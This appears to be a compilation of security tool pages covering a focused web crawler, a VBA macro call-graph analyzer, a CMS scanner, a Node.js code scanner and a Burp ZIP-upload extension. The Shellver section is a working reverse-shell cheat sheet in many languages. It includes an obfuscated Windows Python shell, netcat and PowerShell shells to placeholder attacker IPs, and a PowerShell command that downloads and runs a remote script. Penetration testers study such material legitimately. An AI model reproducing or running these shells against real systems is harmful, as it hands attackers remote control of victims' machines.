Channel: KitPloit - PenTest Tools!

ACHE - A Web Crawler For Domain-Specific Search


ACHE is a focused web crawler. It collects web pages that satisfy some specific criteria, e.g., pages that belong to a given domain or that contain a user-specified pattern. ACHE differs from generic crawlers in the sense that it uses page classifiers to distinguish between relevant and irrelevant pages in a given domain. A page classifier can range from a simple regular expression (one that matches every page containing a specific word, for example) to a machine-learning based classification model. ACHE can also automatically learn how to prioritize links in order to efficiently locate relevant content while avoiding the retrieval of irrelevant content.

ACHE supports many features, such as:
  • Regular crawling of a fixed list of web sites
  • Discovery and crawling of new relevant web sites through automatic link prioritization
  • Configuration of different types of page classifiers (machine-learning, regex, etc.)
  • Continuous re-crawling of sitemaps to discover new pages
  • Indexing of crawled pages using Elasticsearch
  • Web interface for searching crawled pages in real-time
  • REST API and web-based user interface for crawler monitoring
  • Crawling of hidden services using TOR proxies
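The two ideas the introduction describes, a page classifier deciding relevance and link prioritization steering the frontier, are easier to see in a runnable form. The following is an added illustration written for this page, not ACHE's code or API: a tiny focused crawler over a constructed in-memory "web", with a regex page classifier and a hand-written link scorer (ACHE learns its link scores; the keyword hints, page contents and URLs here are assumptions). Run with a fixed fetch budget, it contrasts the harvest rate of prioritized crawling with plain breadth-first crawling:

```python
import heapq
import re
from html.parser import HTMLParser
from urllib.parse import urljoin

# Constructed mini web standing in for live HTTP fetches (url -> HTML); these are not real sites.
MINI_WEB = {
    "http://site.example/": "<html><body>Welcome"
        '<a href="/news">Latest news</a><a href="/cars">Car reviews</a>'
        '<a href="/seafood">Seafood corner</a><a href="/about">About us</a></body></html>',
    "http://site.example/seafood": "<html><body>Our fish counter"
        '<a href="/seafood/tuna">Tuna</a><a href="/seafood/salmon">Salmon</a>'
        '<a href="/news">Latest news</a></body></html>',
    "http://site.example/seafood/tuna": "<html><body>Tuna is a fish</body></html>",
    "http://site.example/seafood/salmon": '<html><body>Salmon is a fish<a href="/recipes">Recipes</a></body></html>',
    "http://site.example/recipes": "<html><body>Fish recipes</body></html>",
    "http://site.example/news": '<html><body>Headlines<a href="/news/1">Story one</a><a href="/news/2">Story two</a></body></html>',
    "http://site.example/news/1": "<html><body>Story one text</body></html>",
    "http://site.example/news/2": "<html><body>Story two text</body></html>",
    "http://site.example/cars": '<html><body>Car reviews<a href="/cars/a">Model A</a></body></html>',
    "http://site.example/cars/a": "<html><body>Model A review</body></html>",
    "http://site.example/about": "<html><body>About us</body></html>",
}

PAGE_PATTERN = re.compile(r"\bfish\b", re.IGNORECASE)   # page classifier: a regex over visible text
LINK_HINTS = ("fish", "seafood", "tuna", "salmon")        # link scorer hints (assumed; ACHE learns these)


class PageParser(HTMLParser):
    """Collects the visible text and the (href, anchor text) pairs of one page."""
    def __init__(self):
        super().__init__()
        self.text, self.links = [], []
        self._href, self._anchor = None, []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href, self._anchor = dict(attrs).get("href"), []

    def handle_data(self, data):
        self.text.append(data)
        if self._href is not None:
            self._anchor.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._anchor)))
            self._href = None


def is_relevant(visible_text):
    return PAGE_PATTERN.search(visible_text) is not None


def link_priority(url, anchor_text, parent_relevant):
    """Higher is better: keyword hints in the URL or anchor text, plus a bonus for links found on relevant pages."""
    hint = any(h in (url + " " + anchor_text).lower() for h in LINK_HINTS)
    return (2.0 if hint else 0.0) + (1.0 if parent_relevant else 0.0)


def crawl(seeds, fetch, budget, prioritize=True):
    """Fetch at most `budget` pages from a priority frontier; returns (relevant_urls, fetched_urls) in fetch order.
    With prioritize=False every link gets priority 0 and the frontier degrades to breadth-first order."""
    frontier, seen, seq = [], set(seeds), 0
    for url in seeds:
        heapq.heappush(frontier, (0.0, seq, url))
        seq += 1
    relevant, fetched = [], []
    while frontier and len(fetched) < budget:
        _, _, url = heapq.heappop(frontier)
        html = fetch(url)
        if html is None:            # unreachable page: skip it
            continue
        fetched.append(url)
        parser = PageParser()
        parser.feed(html)
        page_relevant = is_relevant(" ".join(parser.text))
        if page_relevant:
            relevant.append(url)
        for href, anchor in parser.links:
            target = urljoin(url, href)
            if target in seen:
                continue
            seen.add(target)
            prio = link_priority(target, anchor, page_relevant) if prioritize else 0.0
            heapq.heappush(frontier, (-prio, seq, target))   # min-heap, so negate the priority
            seq += 1
    return relevant, fetched


def harvest_rate(prioritize, budget=5):
    """(relevant pages found, pages fetched) for a crawl of the constructed web from its root."""
    relevant, fetched = crawl(["http://site.example/"], MINI_WEB.get, budget, prioritize)
    return len(relevant), len(fetched)
```

With a budget of five fetches the prioritized crawl finds four relevant pages and never spends a fetch on the news or car sections, while breadth-first order finds one; that difference in harvest rate is what ACHE's learned link prioritization is for.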

Documentation
More info is available on the project's documentation.

Installation
You can either build ACHE from the source code, download the executable binary using conda, or use Docker to build an image and run ACHE in a container.

Build from source with Gradle
Prerequisite: You will need to install a recent version of Java (JDK 8 or later).
To build ACHE from source, you can run the following commands in your terminal:
git clone https://github.com/ViDA-NYU/ache.git
cd ache
./gradlew installDist
which will generate an installation package under ache/build/install/. You can then make the ache command available in the terminal by adding the ACHE binaries to the PATH environment variable:
export ACHE_HOME="{path-to-cloned-ache-repository}/build/install/ache"
export PATH="$ACHE_HOME/bin:$PATH"

Running using Docker
Prerequisite: You will need to install a recent version of Docker. See https://docs.docker.com/engine/installation/ for details on how to install Docker for your platform.
We publish pre-built docker images on Docker Hub for each released version. You can run the latest image using:
docker run -p 8080:8080 vidanyu/ache:latest
Alternatively, you can build the image yourself and run it:
git clone https://github.com/ViDA-NYU/ache.git
cd ache
docker build -t ache .
docker run -p 8080:8080 ache
The Dockerfile exposes two data volumes so that you can mount a directory with your configuration files (at /config) and preserve the crawler stored data (at /data) after the container stops.

Download with Conda
Prerequisite: You need to have Conda package manager installed in your system.
If you use Conda, you can install ache from Anaconda Cloud by running:
conda install -c vida-nyu ache
NOTE: Only released tagged versions are published to Anaconda Cloud, so the version available through Conda may not be up-to-date. If you want to try the most recent version, please clone the repository and build from source or use the Docker version.

Running ACHE
Before starting a crawl, you need to create a configuration file named ache.yml. We provide some configuration samples in the repository's config directory that can help you to get started.
You will also need a page classifier configuration file named pageclassifier.yml. For details on how to configure a page classifier, refer to the page classifiers documentation.
After you have configured a classifier, the last thing you will need is a seed file, i.e., a plain text file containing one URL per line. The crawler will use these URLs to bootstrap the crawl.
Finally, you can start the crawler using the following command:
ache startCrawl -o <data-output-path> -c <config-path> -s <seed-file> -m <model-path>
where,
  • <config-path> is the path to the config directory that contains ache.yml.
  • <seed-file> is the seed file that contains the seed URLs.
  • <model-path> is the path to the model directory that contains the file pageclassifier.yml.
  • <data-output-path> is the path to the data output directory.
Example of running ACHE using the sample pre-trained page classifier model and the sample seeds file available in the repository:
ache startCrawl -o output -c config/sample_config -s config/sample.seeds -m config/sample_model
The crawler will run and print its logs to the console. Hit Ctrl+C at any time to stop it (shutdown may take some time). For long crawls, you should run ACHE in the background using a tool like nohup.

Data Formats
ACHE can output data in multiple formats. The data formats currently available are:
  • FILES (default) - raw content and metadata are stored in rolling compressed files of fixed size.
  • ELASTICSEARCH - raw content and metadata are indexed in an Elasticsearch index.
  • KAFKA - pushes raw content and metadata to an Apache Kafka topic.
  • WARC - stores data using the standard format used by the Web Archive and Common Crawl.
  • FILESYSTEM_HTML - only raw page content is stored, in plain text files.
  • FILESYSTEM_JSON - raw content and metadata are stored in JSON format in files.
  • FILESYSTEM_CBOR - raw content and some metadata are stored in CBOR format in files.
For more details on how to configure data formats, see the data formats documentation page.

Bug Reports and Questions
We welcome user feedback. Please submit any suggestions, questions or bug reports using the Github issue tracker.
We also have a chat room on Gitter.

Contributing
Code contributions are welcome. We use a code style derived from the Google Style Guide, but with 4-space indentation instead of tabs. An Eclipse Formatter configuration file is available in the repository.

Contact



Vba2Graph - Generate Call Graphs From VBA Code, For Easier Analysis Of Malicious Documents

A tool for security researchers who waste their time analyzing malicious Office macros.
Generates a VBA call graph with potentially malicious keywords highlighted.
Allows for quick analysis of malicious macros and easy understanding of the execution flow.

Features
  • Keyword highlighting
  • VBA Properties support
  • External function declaration support
  • Tricky macros with "_Change" execution triggers
  • Fancy color schemes!

Pros
  • Pretty fast
  • Works well on most malicious macros observed in the wild


Cons
  • Static (dynamically resolved calls would not be recognized)
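To make the features and the static limitation above concrete, here is an added, self-contained illustration of how such a call graph is extracted; it is written for this page and is not vba2graph's code. It splits a constructed sample macro into procedures, records external Declare statements, links procedures that mention each other by name, marks event-trigger procedures (the `_Change`/`_Open` naming is the assumption used here) and emits Graphviz DOT with keyword hits highlighted. The keyword list, the trigger rule and the sample macro are all assumptions; the sample deliberately includes an `Application.Run` call on a concatenated string so the "dynamically resolved calls are not recognized" caveat shows up as an unreferenced procedure:

```python
import re

# Constructed sample macro (not from a real document): an Open trigger, a TextBox _Change trigger,
# an external declaration, and one procedure reachable only through a dynamically built name.
SAMPLE_VBA = """
Private Declare PtrSafe Function Sleep Lib "kernel32" (ByVal ms As Long)
Private Sub Document_Open()
    Sleep 5000          ' delay; resolves to the external declaration above
    Stage1
End Sub
Private Sub TextBox1_Change()
    Stage2 "x"
End Sub
Sub Stage1()
    t = Environ("TEMP")
    Stage2 t
End Sub
Sub Stage2(arg As String)
    Set o = CreateObject("Scripting.FileSystemObject")
    Application.Run "Sta" & "ge3"   ' dynamic call: invisible to a static call graph
End Sub
Sub Stage3()
    ' only reachable through the dynamic call above
End Sub
"""

# Keywords worth highlighting in the graph (assumed list, not vba2graph's own).
KEYWORDS = ("Shell", "CreateObject", "Environ", "Application.Run", "CallByName", "URLDownloadToFile", "Sleep")
DEF_RE = re.compile(r"^\s*(?:Public\s+|Private\s+|Friend\s+)?(?:Static\s+)?(Sub|Function|Property\s+(?:Get|Let|Set))\s+(\w+)", re.I)
DECL_RE = re.compile(r"^\s*(?:Public\s+|Private\s+)?Declare\s+(?:PtrSafe\s+)?(?:Sub|Function)\s+(\w+)", re.I)
END_RE = re.compile(r"^\s*End\s+(?:Sub|Function|Property)\b", re.I)
TRIGGER_RE = re.compile(r"(_Change|_Resize|_Open|_Activate)$|^Auto(Open|Exec|Close)$", re.I)  # assumed trigger rule


def split_procedures(vba):
    """Return ({procedure name: [body lines]}, [external declaration names])."""
    procs, externals, current, body = {}, [], None, []
    for raw in vba.splitlines():
        line = raw.split("'", 1)[0]            # drop comments (naive: ignores apostrophes inside strings)
        if current is None:
            m = DECL_RE.match(line)
            if m:
                externals.append(m.group(1))
                continue
            m = DEF_RE.match(line)
            if m:
                current, body = m.group(2), []
        elif END_RE.match(line):
            procs[current], current = body, None
        else:
            body.append(line)
    return procs, externals


def _mentions(word, text):
    return re.search(r"\b%s\b" % re.escape(word), text, re.I) is not None


def build_call_graph(vba):
    """name -> {calls, keywords, trigger, external}; calls are resolved by literal name only (static)."""
    procs, externals = split_procedures(vba)
    names = list(procs) + externals
    graph = {}
    for name, body in procs.items():
        text = "\n".join(body)
        graph[name] = {
            "calls": {n for n in names if n != name and _mentions(n, text)},
            "keywords": [k for k in KEYWORDS if _mentions(k, text)],
            "trigger": TRIGGER_RE.search(name) is not None,
            "external": False,
        }
    for ext in externals:
        graph[ext] = {"calls": set(), "keywords": [k for k in KEYWORDS if k.lower() == ext.lower()],
                      "trigger": False, "external": True}
    return graph


def unreferenced_procedures(graph):
    """Procedures that are neither triggers nor statically called: candidates for dynamic invocation."""
    called = {c for info in graph.values() for c in info["calls"]}
    return sorted(n for n, info in graph.items() if not info["trigger"] and n not in called)


def to_dot(graph):
    """Emit Graphviz DOT: keyword hits filled red, triggers with a thick border, externals as ellipses."""
    lines = ["digraph vba {", "  node [shape=box];"]
    for name, info in graph.items():
        label = name + ("\\n" + ", ".join(info["keywords"]) if info["keywords"] else "")
        attrs = ['label="%s"' % label]
        if info["keywords"]:
            attrs.append("style=filled fillcolor=lightcoral")
        if info["trigger"]:
            attrs.append("penwidth=3")
        if info["external"]:
            attrs.append("shape=ellipse")
        lines.append('  "%s" [%s];' % (name, " ".join(attrs)))
    for name, info in graph.items():
        for callee in sorted(info["calls"]):
            lines.append('  "%s" -> "%s";' % (name, callee))
    lines.append("}")
    return "\n".join(lines)
```

Feed `to_dot(build_call_graph(SAMPLE_VBA))` to `dot -Tpng` to render it. In the sample, `Stage3` comes back from `unreferenced_procedures` with no incoming edge: an analyst reading the graph should treat such orphans as a hint that the macro builds procedure names at runtime and go back to the source for them, which is exactly the gap the Cons entry describes.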


Examples
Example 1:
Trickbot downloader - utilizes object Resize event as initial trigger, followed by TextBox_Change triggers.


Example 2:


Check out the Examples folder for more cases.

Installation

Install oletools:
https://github.com/decalage2/oletools/wiki/Install

Install Python Requirements
pip2 install -r requirements.txt

Install Graphviz

Windows
Install Graphviz msi:
https://graphviz.gitlab.io/_pages/Download/Download_windows.html
Add "dot.exe" to PATH env variable or just:
set PATH=%PATH%;C:\Program Files (x86)\Graphviz2.38\bin

Mac
brew install graphviz

Ubuntu
sudo apt-get install graphviz

Arch
sudo pacman -S graphviz

Usage
usage: vba2graph.py [-h] [-o OUTPUT] [-c {0,1,2,3}] (-i INPUT | -f FILE)

optional arguments:
-h, --help show this help message and exit
-o OUTPUT, --output OUTPUT
output folder (default: "output")
-c {0,1,2,3}, --colors {0,1,2,3}
color scheme number [0, 1, 2, 3] (default: 0 - B&W)
-i INPUT, --input INPUT
olevba generated file or .bas file
-f FILE, --file FILE Office file with macros

Usage Examples (All Platforms)
Only Python 2 is supported:
# Generate call graph directly from an Office file with macros [tnx @doomedraven]
python2 vba2graph.py -f malicious.doc -c 2

# Generate vba code using olevba then pipe it to vba2graph
olevba malicious.doc | python2 vba2graph.py -c 1

# Generate call graph from VBA code
python2 vba2graph.py -i vba_code.bas -o output_folder

Output
You'll get 4 folders in your output folder:
  • png: the actual graph image you are looking for
  • svg: same graph image, just in vector graphics
  • dot: the dot file which was used to create the graph image
  • bas: the VBA functions code that was recognized by the script (for debugging)

Batch Processing

Mac/Linux:
The batch.sh script is provided for running olevba and vba2graph over an input folder of malicious docs.
It deletes the output directory first; use with caution.


CMS Scanner - Scan Wordpress, Drupal, Joomla, vBulletin Websites For Security Issues


Scan Wordpress, Drupal, Joomla, vBulletin websites for Security issues.

CMSScan provides a centralized security dashboard for CMS security scans. It is powered by wpscan, droopescan, vbscan and joomscan. It supports both on-demand and scheduled scans and can send email reports.

Install
# Requires ruby, ruby-dev, gem, python3 and git
git clone https://github.com/ajinabraham/CMSScan.git
cd CMSScan
./setup.sh

Run
./run.sh

Periodic Scans
You can perform periodic CMS scans with CMSScan. You must run CMSScan server separately and configure the following before running the scheduler.py script.
# SMTP SETTINGS
SMTP_SERVER = ''
FROM_EMAIL = ''
TO_EMAIL = ''

# SERVER SETTINGS
SERVER = ''

# SCAN SITES
WORDPRESS_SITES = []
DRUPAL_SITES = []
JOOMLA_SITES = []
VBULLETIN_SITES = []
Add a cronjob
crontab -e
@weekly /usr/bin/python3 scheduler.py

Docker

Local
docker build -t cmsscan .
docker run -it -p 7070:7070 cmsscan

Prebuilt Image
docker pull opensecurity/cmsscan
docker run -it -p 7070:7070 opensecurity/cmsscan

Screenshots




Shellver - Reverse Shell Cheat Sheet Tool

Reverse Shell Cheat Sheet Tool

Install Note
Clone the repository:
git clone https://github.com/0xR0/shellver.git
Then go inside:
cd shellver/
Then install it:
python setup.py -i
Run shellver -h, or shellver <method>, where method is one of bash, perl, python, php, ruby, netcat, xterm, shell or all.

Example
shellver python


shellver all


From https://github.com/swisskyrepo

Reverse Shell Methods

Reverse Shell Cheat Sheet

Bash TCP
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

0<&196;exec 196<>/dev/tcp/<your IP>/<same unfiltered port>; sh <&196 >&196 2>&196

Bash UDP
Victim:
sh -i >& /dev/udp/127.0.0.1/4242 0>&1

Listener:
nc -u -lvp 4242

Perl
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"[IPADDR]:[PORT]");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'


NOTE: Windows only
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"[IPADDR]:[PORT]");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

Python
Linux only
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Windows only
C:\Python27\python.exe -c "(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('10.11.0.37', 4444)), [[[(s2p_thread.start(), [[(p2s_thread.start(), (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: None)][2])(__contextlib.nested(type('except', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: __exctype is not None and (issubclass(__exctype, KeyboardInterrupt) and [True for __out[0] in [((s.close(), lambda after: after())[1])]][0])})(), type('try', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: [False for __out[0] in [((p.wait(), (lambda __after: __after()))[1])]][0]})())))([None]))[1] for p2s_thread.daemon in [(True)]][0] for __g['p2s_thread'] in [(threading.Thread(target=p2s, args=[s, p]))]][0])[1] for s2p_thread.daemon in [(True)]][0] for __g['s2p_thread'] in [(threading.Thread(target=s2p, args=[s, p]))]][0] for __g['p'] in [(subprocess.Popen(['\\windows\\system32\\cmd.exe'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE))]][0])[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['p2s'], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: (__l['s'].send(__l['p'].stdout.read(1)), __this())[1] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 'p2s')]][0] for __g['s2p'], s2p.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: [(lambda __after: (__l['p'].stdin.write(__l['data']), __after())[1] if (len(__l['data']) > 0) else __after())(lambda: __this()) for __l['data'] in [(__l['s'].recv(1024))]][0] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 's2p')]][0] for __g['os'] in [(__import__('os', __g, __g))]][0] for __g['socket'] in [(__import__('socket', __g, __g))]][0] for __g['subprocess'] in [(__import__('subprocess', __g, 
__g))]][0] for __g['threading'] in [(__import__('threading', __g, __g))]][0])((lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), globals(), __import__('contextlib'))"

PHP
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

Ruby
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

ruby -rsocket -e 'exit if fork;c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

NOTE: Windows only
ruby -rsocket -e 'c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

Netcat Traditional
nc -e /bin/sh [IPADDR] [PORT]

Netcat OpenBsd
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f

Ncat
ncat 127.0.0.1 4444 -e /bin/bash
ncat --udp 127.0.0.1 4444 -e /bin/bash

Powershell
powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("[IPADDR]",[PORT]);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.1.3.40',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
powershell IEX (New-Object Net.WebClient).DownloadString('https://gist.githubusercontent.com/staaldraad/204928a6004e89553a8d3db0ce527fd5/raw/fe5f74ecfae7ec0f2d50895ecf9ab9dafe253ad4/mini-reverse.ps1')

Awk
awk 'BEGIN {s = "/inet/tcp/0/<IP>/<PORT>"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null

Java
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

Lua
Linux only
lua -e "require('socket');require('os');t=socket.tcp();t:connect('10.0.0.1','1234');os.execute('/bin/sh -i <&3 >&3 2>&3');"
Windows and Linux
lua5.1 -e 'local host, port = "127.0.0.1", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, 'r') local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'

NodeJS
(function(){
var net = require("net"),
cp = require("child_process"),
sh = cp.spawn("/bin/sh", []);
var client = new net.Socket();
client.connect(8080, "10.17.26.64", function(){
client.pipe(sh.stdin);
sh.stdout.pipe(client);
sh.stderr.pipe(client);
});
return /a/; // Prevents the Node.js application from crashing
})();


or

require('child_process').exec('nc -e /bin/sh [IPADDR] [PORT]')

or

var x = global.process.mainModule.require
x('child_process').exec('nc [IPADDR] [PORT] -e /bin/bash')

Groovy - by frohoff
NOTE: the Java reverse shell also works for Groovy
String host="localhost";
int port=8044;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

Spawn TTY
/bin/sh -i
(From an interpreter)
python -c 'import pty; pty.spawn("/bin/sh")'
perl -e 'exec "/bin/sh";'
perl: exec "/bin/sh";
ruby: exec "/bin/sh"
lua: os.execute('/bin/sh')
To get shortcuts, su, nano and autocomplete in a partial TTY shell (note: OhMyZSH might break this trick; a plain sh is recommended):
# in host
ctrl+z
stty raw -echo
fg

# in reverse shell
reset
export SHELL=bash
export TERM=xterm-256color
stty rows <num> columns <cols>
(From within vi)
:!bash
:set shell=/bin/bash:shell
(From within nmap)
!sh

Thanks to


NodeJsScan - A Static Security Code Scanner For Node.js Applications


Static security code scanner (SAST) for Node.js applications.

Configure & Run NodeJsScan
Install Postgres and configure SQLALCHEMY_DATABASE_URI in core/settings.py
pip3 install -r requirements.txt
python3 migrate.py # Run once to create database entries required
python3 app.py # Testing Environment
gunicorn -b 0.0.0.0:9090 app:app # Production Environment
This will run NodeJsScan on http://0.0.0.0:9090
If you need to debug, set DEBUG = True in core/settings.py

NodeJsScan CLI
The command line interface (CLI) allows you to integrate NodeJsScan with DevSecOps CI/CD pipelines. The results are in JSON format. When you use CLI the results are never stored with NodeJsScan backend.
virtualenv venv -p python3
source venv/bin/activate
(venv)$ pip install nodejsscan
(venv)$ nodejsscan
usage: nodejsscan [-h] [-f FILE [FILE ...]] [-d DIRECTORY [DIRECTORY ...]]
[-o OUTPUT] [-v]

optional arguments:
-h, --help show this help message and exit
-f FILE [FILE ...], --file FILE [FILE ...]
Node.js file(s) to scan
-d DIRECTORY [DIRECTORY ...], --directory DIRECTORY [DIRECTORY ...]
Node.js source code directory/directories to scan
-o OUTPUT, --output OUTPUT
Output file to save JSON report
-v, --version Show nodejsscan version

Python API
import core.scanner as njsscan
res_dir = njsscan.scan_dirs(['/Code/Node.Js-Security-Course'])
res_file = njsscan.scan_file(['/Code/Node.Js-Security-Course/deserialization.js'])
print(res_file)

[{'title': 'Deserialization Remote Code Injection', 'description': "User controlled data in 'unserialize()' or 'deserialize()' function can result in Object Injection or Remote Code Injection.", 'tag': 'rci', 'line': 11, 'lines': 'app.use(cookieParser())\n\napp.get(\'/\', function(req, res) {\n if (req.cookies.profile) {\n var str = new Buffer(req.cookies.profile, \'base64\').toString();\n var obj = serialize.unserialize(str);\n if (obj.username) {\n res.send("Hello " + escape(obj.username));\n }\n } else {', 'filename': 'deserialization.js', 'path': '/Users/ajin/Code/Node.Js-Security-Course/deserialization.js', 'sha2': '06f3f0ff3deed27aeb95955a17abc7722895d3538c14648af97789d8777cee50'}]
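Since the CLI section above presents the JSON results as the integration point for CI/CD pipelines, the natural next step is a policy gate that turns a list of findings into a build verdict. The following is an added example written for this page, not NodeJsScan's code: it assumes a list of finding dicts with the field names shown in the Python API output above (`title`, `tag`, `line`, `filename`, `path`), and the sample findings, the blocking tags, the ignored path prefix and the baseline mechanism are all constructed assumptions for the illustration:

```python
import json
import sys

# Constructed findings using the field names of the API result above; not real scan output.
SAMPLE_FINDINGS = [
    {"title": "Deserialization Remote Code Injection", "tag": "rci", "line": 11,
     "filename": "deserialization.js", "path": "/src/deserialization.js"},
    {"title": "Constructed informational finding", "tag": "info", "line": 3,
     "filename": "util.js", "path": "/src/util.js"},
    {"title": "Constructed informational finding", "tag": "info", "line": 40,
     "filename": "legacy.js", "path": "/src/vendor/legacy.js"},
]

BLOCKING_TAGS = {"rci"}                      # policy: finding tags that fail the build (assumption)
IGNORED_PATH_PREFIXES = ("/src/vendor/",)    # third-party code tracked elsewhere (assumption)


def fingerprint(finding):
    """Stable key for a finding that has been reviewed and accepted into the baseline."""
    return (finding["filename"], finding["title"], finding["line"])


def triage(findings, baseline=frozenset()):
    """Split findings into blocking / reported / suppressed according to policy and baseline."""
    result = {"blocking": [], "reported": [], "suppressed": []}
    for f in findings:
        if f["path"].startswith(IGNORED_PATH_PREFIXES) or fingerprint(f) in baseline:
            result["suppressed"].append(f)
        elif f["tag"] in BLOCKING_TAGS:
            result["blocking"].append(f)
        else:
            result["reported"].append(f)
    return result


def summarize(findings):
    """Count findings per tag, for the build log."""
    counts = {}
    for f in findings:
        counts[f["tag"]] = counts.get(f["tag"], 0) + 1
    return counts


def gate(findings, baseline=frozenset()):
    """Print the blocking findings and return the process exit code (1 = fail the build)."""
    verdict = triage(findings, baseline)
    for f in verdict["blocking"]:
        print("BLOCK %s:%d %s [%s]" % (f["filename"], f["line"], f["title"], f["tag"]))
    print("summary:", summarize(findings), "suppressed:", len(verdict["suppressed"]))
    return 1 if verdict["blocking"] else 0


def load_report(path):
    """Load a JSON report assumed to be a list of finding dicts (the API shape above)."""
    with open(path) as fh:
        return json.load(fh)


if __name__ == "__main__":
    data = load_report(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE_FINDINGS
    sys.exit(gate(data))
```

Running it with no argument gates the constructed sample and exits 1 because of the `rci` finding; in a pipeline you would pass the report written by `nodejsscan -o` (assuming it carries the same list shape) and commit the accepted fingerprints as the baseline so that only new blocking findings fail the build.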

Docker
docker build -t nodejsscan .
docker run -it -p 9090:9090 nodejsscan

DockerHub
docker pull opensecurity/nodejsscan
docker run -it -p 9090:9090 opensecurity/nodejsscan:latest

NodeJsScan Web UI


Static Analysis





ZIP File Raider - Burp Extension For ZIP File Payload Testing

ZIP File Raider is a Burp Suite extension for attacking web applications with ZIP file upload functionality. You can easily inject Burp Scanner/Repeater payloads into the ZIP content of HTTP requests, which is not feasible by default. The extension automates the extraction and compression steps.
This software was created by Natsasit Jirathammanuwat during a cooperative education course at King Mongkut's University of Technology Thonburi (KMUTT).

Installation
  1. Set up Jython standalone Jar in Extender > Options > Python Environment > "Select file...".
  2. Add ZIP File Raider extension in Extender > Extensions > Add > CompressedPayloads.py (Extension type: Python)

How to use

Send the HTTP request with a compressed file to the ZIP File Raider
First, right click on the HTTP request with a compressed file in HTTP body and then select "Send request to ZIP File Raider extender Repeater" or Scanner.



Repeater
This Repeater tab makes it possible to edit the content of the compressed file and then resend the request to the server immediately.


Descriptions for ZIP File Raider - Repeater tab:
  1. Files and folders pane - list of files and folders in the compressed file which is sent from the previous step (Send request to ...), select a file to edit its content.
  2. Edit pane - edit the content of selected file in text or hex mode (press "Save" after editing one file if you want to edit multiple files in a ZIP file).
